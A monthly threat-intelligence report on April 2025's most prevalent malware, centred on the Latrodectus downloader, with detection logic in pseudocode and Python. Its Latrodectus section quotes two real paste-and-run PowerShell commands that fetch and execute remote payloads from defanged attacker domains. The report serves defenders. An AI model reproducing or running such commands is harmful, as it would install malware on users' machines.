Highlights from April
Amber Albatross remains at number 1 on our top 10 most prevalent threat list this month. Amber Albatross is Red Canary’s name for a cluster of activity that starts from an adware program and leads to a PyInstaller EXE with stealer-like capabilities. Our ongoing research into this threat—including additional malware analysis and updated installer tracking—continues to improve our visibility, leading to a higher volume of published threats in April.
Briefly, it’s worth noting that SocGholish dropped out of the top 10 entirely for the first time since November 2023.
Latrodectus made its debut in the top 10 this month, and it’s no coincidence that it coincides with the U.S. tax season. Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, frequently leveraging financially-themed lures. You can read more about Latrodectus below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for April 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| ⬆ 1 | Amber Albatross | Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a PyInstaller EXE with stealer capabilities |
| ⬆ 2 | | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| ⬆ 3 | | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| ⬆ 4 | | Red Canary's name for a VBS worm that is delivered via an infected USB and uses a printui DLL hijack to deliver a cryptomining payload |
| ⬇ 5 | | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| ⬆ 6* | Bondat | Worm that is associated with cryptocurrency mining, as well as beaconing out to C2 and downloading additional payloads, that spreads via removable media running malicious JavaScript files |
| ⬆ 6* | Latrodectus | Downloader used by adversaries to execute arbitrary commands and deliver additional payloads |
| ⬆ 8* | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| ⬆ 8* | Maya "vaccine" virus | Worm-like virus that infects the Maya graphic design software created by Autodesk |
| ⬆ 8* | | Open source tool that dumps credentials using various techniques |
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
* Denotes a tie
Latrodectus weaves its web
Latrodectus made its debut in the top 10 this month and it’s no coincidence that it coincides with the US tax season. Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, frequently leveraging financially-themed lures. Proofpoint assesses that Latrodectus was written by the same developers as IcedID, based on similarities in the code. It was first reported in November 2023 being distributed by TA577 in a number of phishing campaigns. In January 2024, it was reportedly also being used by TA578.
Latrodectus has gone through several versions, the most recently reported being version 1.9 released in February 2025. It has a range of capabilities, including gathering system information and delivering additional payloads like IcedID. In May 2025, some samples reportedly went on to deliver LummaC2.
Latrodectus was one of the malware families targeted by Operation Endgame in May 2024, but the actors behind it rebuilt their infrastructure fairly quickly. It was in use again by late June 2024, observed by Red Canary and other researchers being dropped by Brute Ratel. Brute Ratel (aka BRC4) is a customized attack simulation tool designed to evade common defensive controls.
Latrodectus behavior to look out for
We observed a recent wave of Latrodectus activity begin in mid-March and increase until the end of April 2025. To give an example of what we saw in April, the first observed endpoint behavior was a PowerShell command reaching out to the URL https[:]//rgbw[.]live/:

```
"PowerShell.exe" -WindowStyle Hidden -Command "$i = New-Object -ComObject WindowsInstaller.Installer;$i.UILevel = 2;$i.InstallProduct('https[:]//rgbw[.]live/','')"; Browser check identificate: 8006powershell -WindowStyle Hidden -Command "$i = New-Object -ComObject Wind
```
The inclusion of the “Browser check identificate:” prompt and a subsequent change made to the RunMRU registry key indicate this likely uses a paste-and-run fake CAPTCHA lure for initial execution. Following a successful connection to https[:]//rgbw[.]live/, msiexec.exe spawned the process NVIDIA Notification.exe, which then loaded C:\Users\username\AppData\Roaming\nvidia\libcef.dll. This DLL is a Latrodectus payload that’s packaged with the legitimate DLL and uses sideloading to execute. The Latrodectus DLL reached out to architrata[.]com, which has also been identified as a Latrodectus C2 domain.
The above example doesn’t have Brute Ratel in the execution chain, but we did observe Brute Ratel leading to Latrodectus in March 2025. Based on OSINT reporting, at least two other campaigns delivered Latrodectus plus Brute Ratel this spring:
- Tax and IRS-themed phishing emails delivering malicious PDF attachments leading to URL redirects and script downloads
- Fake Windows 11 Pro download sites also leading to URL redirects and script downloads
Microsoft attributes both of these Latrodectus campaigns to the adversary they track as Storm-0249. It is not clear if the activity we observed was part of either of the above campaigns.
Since Latrodectus is frequently sideloaded or injected into a process like explorer.exe for execution, it can be challenging from an endpoint perspective to pinpoint malicious activity with high confidence as Latrodectus before it reaches out to known C2 infrastructure. That said, since it is typically delivered via a phish, a fake download, or another type of loader, there are a number of detection opportunities. As an example, a paste and run > Brute Ratel > Latrodectus threat we saw in March 2025 had this initial execution paste-and-run command:

```
powershell -Command "$f=Join-Path $env:TEMP 'car.txt'; curl.exe -s 'http[:]//lygpt[.]live/d/' -o $f; Start-Process -WindowStyle Hidden -FilePath 'cscript.exe' -ArgumentList '//E:jscript',$f" # ✔ ''Cloud Verification ID: 1090''
```

Using cscript.exe to execute a command containing //e:Jscript in this way gives us a detection opportunity.
Detection opportunity: Instances of wscript.exe or cscript.exe to run/interpret malicious JScript payloads
The following pseudo-detection analytic identifies instances of wscript.exe or cscript.exe running/interpreting malicious JScript payloads as a means of evasion. Threats, as well as techniques like paste and run, can leverage this technique in an attempt to conceal execution. It is not very common for wscript.exe or cscript.exe to use the //e:Jscript flag on a file that does not have a .js file extension.
```
process == ('wscript' || 'cscript')
&&
command_includes ('/e:jscript')
&&
command_excludes ('.js' || '.bat' || '.cmd' || * )
```

Note: * is a placeholder for any additional exclusions your environment may need to reduce noise and increase fidelity
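As an added example, not Red Canary's code or the analytic as it runs in their platform, here is the pseudo-analytic above expressed in Python over a handful of constructed process-start events. The `ProcessEvent` fields, the sample command lines, and the `exclusions` parameter (standing in for the `*` placeholder) are assumptions; no EDR schema is implied. It goes slightly beyond the pseudo-analytic in two ways: the engine switch matches with one or two slashes in any letter case, and the extension exclusions are anchored as whole tokens so that a `.json` or `.jse` argument is not silently treated as a `.js` file.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Sequence


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-start record (assumed shape, not a specific EDR schema)."""
    process: str        # image name, e.g. "cscript.exe"
    command_line: str   # full command line as the sensor recorded it


# Windows Script Host binaries the analytic covers
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# The engine switch: /E:jscript or //E:jscript, any letter case
ENGINE_SWITCH = re.compile(r"//?e:jscript\b", re.IGNORECASE)

# Extensions that legitimately carry JScript; the analytic's '*' placeholder
# becomes the `exclusions` parameter of the functions below
DEFAULT_EXCLUSIONS: Sequence[str] = (".js", ".bat", ".cmd")


def build_exclusion_pattern(exclusions: Sequence[str]) -> "re.Pattern[str]":
    """Match an excluded extension only as a whole token, so '.js' does not
    also match '.json' or '.jse' and suppress a real hit."""
    alternatives = "|".join(re.escape(ext.lstrip(".")) for ext in exclusions)
    return re.compile(r"\.(?:%s)(?![A-Za-z0-9_])" % alternatives, re.IGNORECASE)


def matches_analytic(event: ProcessEvent,
                     exclusions: Sequence[str] = DEFAULT_EXCLUSIONS) -> bool:
    """process == wscript|cscript && command_includes /e:jscript
    && command_excludes every listed extension."""
    if event.process.lower() not in SCRIPT_HOSTS:
        return False
    if not ENGINE_SWITCH.search(event.command_line):
        return False
    return build_exclusion_pattern(exclusions).search(event.command_line) is None


def run_analytic(events: Iterable[ProcessEvent],
                 exclusions: Sequence[str] = DEFAULT_EXCLUSIONS) -> List[ProcessEvent]:
    """Return the events the analytic would raise, in input order."""
    return [e for e in events if matches_analytic(e, exclusions)]


# Constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    # Modelled on the paste-and-run chain in the post: cscript.exe told to
    # interpret a .txt file with the JScript engine
    ProcessEvent("cscript.exe",
                 r"cscript.exe //E:jscript C:\Users\user\AppData\Local\Temp\car.txt"),
    # Benign: an admin script with the expected .js extension
    ProcessEvent("cscript.exe", r"cscript.exe //E:jscript C:\Scripts\inventory.js"),
    # Single slash, mixed case, .json argument: not a .js file, so it fires
    ProcessEvent("CScript.exe", r"CScript.exe /e:JScript C:\Temp\config.json"),
    # Benign: no engine switch at all
    ProcessEvent("wscript.exe", r"wscript.exe //nologo C:\Scripts\logon.vbs"),
    # The parent PowerShell from the post mentions the switch, but the
    # analytic keys on the script host process itself, not its parent
    ProcessEvent("powershell.exe",
                 "powershell -Command \"$f=Join-Path $env:TEMP 'car.txt'; "
                 "Start-Process -FilePath 'cscript.exe' -ArgumentList '//E:jscript',$f\""),
]


if __name__ == "__main__":
    for hit in run_analytic(SAMPLE_EVENTS):
        print("ALERT:", hit.command_line)
```

Running the block prints the two `cscript.exe` events whose script argument lacks a `.js`, `.bat` or `.cmd` extension. Passing a longer `exclusions` sequence (for example adding `.json` if a line-of-business tool in your environment legitimately feeds JSON-named JScript to the host) is the tuning the note's `*` placeholder refers to.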